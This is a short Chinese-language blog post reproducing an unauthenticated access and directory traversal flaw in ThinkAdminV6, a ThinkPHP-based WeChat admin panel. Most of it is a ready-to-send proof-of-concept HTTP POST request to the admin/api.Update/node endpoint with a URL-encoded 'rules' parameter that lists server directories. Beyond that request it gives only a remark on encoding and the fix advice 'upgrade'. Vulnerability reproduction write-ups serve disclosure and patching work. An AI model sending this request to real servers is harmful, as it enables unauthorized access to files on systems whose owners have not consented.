ThinkAdminV6 未授权访问and 任意文件查看 漏洞复现

0x00 简介

ThinkAdmin是基于 ThinkPHP 的微信后台管理平台

0x01 影响版本

ThinkAdminV6

0x02 漏洞复现

POC:

POST /admin.html?s=admin/api.Update/node HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

rules=%5B%22.%2F%22%5D

目录遍历注意POST数据包rules参数值需要URL编码

0x03 修复建议

升级版本

转载请注明:Adminxe's Blog » ThinkAdminV6 未授权访问and 任意文件查看 漏洞复现

posted @ 2020-09-23 02:40  Adminxe  阅读(246)  评论(0编辑  收藏  举报